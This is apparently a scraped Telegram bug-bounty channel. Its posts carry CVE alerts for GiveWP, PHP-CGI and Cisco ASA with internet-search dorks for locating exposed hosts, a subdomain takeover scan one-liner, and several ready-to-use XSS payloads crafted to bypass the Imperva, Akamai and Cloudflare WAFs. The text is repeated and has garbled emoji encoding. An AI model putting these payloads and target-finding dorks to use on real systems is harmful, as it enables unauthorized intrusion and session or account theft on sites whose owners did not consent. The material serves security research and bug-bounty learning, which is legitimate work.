CVE-2024-9634: RCE in GiveWP WordPress Plugin, 9.8 rating ๐ฅ
Another one critical vulnerability in GiveWP. This time, attackers can inject PHP code using one parameter.
Search at Netlas.io:
๐ Link: https://nt.ls/9tUYx
๐ Dork: http.body:"plugins/give/assets/dist"
Read more: https://github.com/advisories/GHSA-6fx6-wrpf-cpgv
Another one critical vulnerability in GiveWP. This time, attackers can inject PHP code using one parameter.
Search at Netlas.io:
๐ Link: https://nt.ls/9tUYx
๐ Dork: http.body:"plugins/give/assets/dist"
Read more: https://github.com/advisories/GHSA-6fx6-wrpf-cpgv
๐5โค3
POC for CVE-2024-4577 PHP CGI Argument Injection ๐ฅ ๐ฅ ๐ฅ
Nuclei Template: https://github.com/11whoami99/CVE-2024-4577/blob/main/CVE-2024-4577.yaml
Nuclei Template: https://github.com/11whoami99/CVE-2024-4577/blob/main/CVE-2024-4577.yaml
1โค9๐2
Here are few Good GraphQl report to learn more about it.
1. hackerone.com/reports/2048725
2. hackerone.com/reports/2524939
3. hackerone.com/reports/2357012
4. hackerone.com/reports/2122671
5. hackerone.com/reports/2207248
6. hackerone.com/reports/1864188
7. hackerone.com/reports/1085332
8. hackerone.com/reports/1084904
9. hackerone.com/reports/1293377
10. hackerone.com/reports/1192460
1. hackerone.com/reports/2048725
2. hackerone.com/reports/2524939
3. hackerone.com/reports/2357012
4. hackerone.com/reports/2122671
5. hackerone.com/reports/2207248
6. hackerone.com/reports/1864188
7. hackerone.com/reports/1085332
8. hackerone.com/reports/1084904
9. hackerone.com/reports/1293377
10. hackerone.com/reports/1192460
HackerOne
Sorare disclosed on HackerOne: Circular based introspetion Query...
## Summary:
Hi Team, Hope you are doing great Sorare graphql Api has introspection enabled by default as per the policy it's meant to be public so they can facilitate their users with Graphql...
Hi Team, Hope you are doing great Sorare graphql Api has introspection enabled by default as per the policy it's meant to be public so they can facilitate their users with Graphql...
๐6โค3
Subdomain Takeover POC :
subfinder -d domain | httpx -silent > subdomains.txt ; nuclei -t /root/nuclei-templates/http/takeovers -l subdomains.txt
๐8โค1
80% bug bounties is about understanding the application/framework/protocol and (knowing about what exactly are you doing or if it's actually worth doing)
๐29๐ฅ4๐ฟ3โค1
CVE-2024-20329: Improper Neutralization of Command Delimiters in Cisco ASA, 9.9 rating ๐ฅ๐ฅ๐ฅ
The vulnerability allows an attacker with low privileges to remotely execute commands via SSH and thus gain full control of the system.
More then 140k instances at Netlas.io:
๐ Link: https://nt.ls/Rfjme
๐ Dork: http.body:"/+CSCOE+/logon.html"
Vendor's advisory: https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asa-ssh-rce-gRAuPEUF
The vulnerability allows an attacker with low privileges to remotely execute commands via SSH and thus gain full control of the system.
More then 140k instances at Netlas.io:
๐ Link: https://nt.ls/Rfjme
๐ Dork: http.body:"/+CSCOE+/logon.html"
Vendor's advisory: https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asa-ssh-rce-gRAuPEUF
โค3๐ฟ2๐1
Please open Telegram to view this post
VIEW IN TELEGRAM
Gist
Iโve analyzed numerous tools, blogs, tweets, and other resources on bypassing 403 Forbidden errors using HTTP Headers Fuzzing techniques.โฆ
Iโve analyzed numerous tools, blogs, tweets, and other resources on bypassing 403 Forbidden errors using HTTP Headers Fuzzing techniques. After extensive research, Iโve compiled a list of headers y...
1โค12๐3๐ฟ1
โก๏ธFound a security vulnerability in any site?
โ Check if it has a public bug bounty program:
https://xplo1t-sec.github.io/bugbounty-lookup/
#BugBounty #bugbountytips
โ Check if it has a public bug bounty program:
https://xplo1t-sec.github.io/bugbounty-lookup/
#BugBounty #bugbountytips
1โค6๐ฅ3๐ณ1
A solid XSS payload that bypasses Imperva WAF โ๏ธ
#infosec #cybersec #bugbountytips
<a/href="j%0A%0Davascript:{var{3:s,2:h,5:a,0:v,4:n,1:e}='earltv'}[self][0][v+a+e+s](e+s+v+h+n)(/infected/.source)" />click
#infosec #cybersec #bugbountytips
1๐ฅ9๐ณ3
Reflected XSS Akami Waf Bypass in Redirect Parameter using HTTP Parameter Pollution and Double URL Encode:โ๏ธ
/login?ReturnUrl=javascript:1&ReturnUrl=%2561%256c%2565%2572%2574%2528%2564%256f%2563%2575%256d%2565%256e%2574%252e%2564%256f%256d%2561%2569%256e%2529
1๐ฅ5๐4๐ณ2
Cloudflare #XSS WAF Bypass by @nav1n0x
Payload:
#cybersec #bugbountytips #infosec
Payload:
"%2Bself[%2F*foo*%2F'alert'%2F*bar*%2F](self[%2F*foo*%2F'document'%2F*bar*%2F]['domain'])%2F%2F
#cybersec #bugbountytips #infosec
1๐10๐ฟ3๐ณ1
an XSS payload to bypass some waf & filters in Firefox
#infosec #cybersec #bugbountytips
<input accesskey=X onclick="self['wind'+'ow']['one'+'rror']=alert;throw 1337;">
#infosec #cybersec #bugbountytips
1โค9
Retrieves DNS records without any authentication
Replace example.com with the target domain.
curl -s "https://api.hackertarget.com/dnslookup/?q=example.com"
Replace example.com with the target domain.
26๐ฟ12โค7๐2
Brut Security pinned ยซ๐จ If you're looking for accurate IoT results, then Sign Up On @Netlas ๐ฎโ๐จ https://app.netlas.io/ref/9cc61538/ยป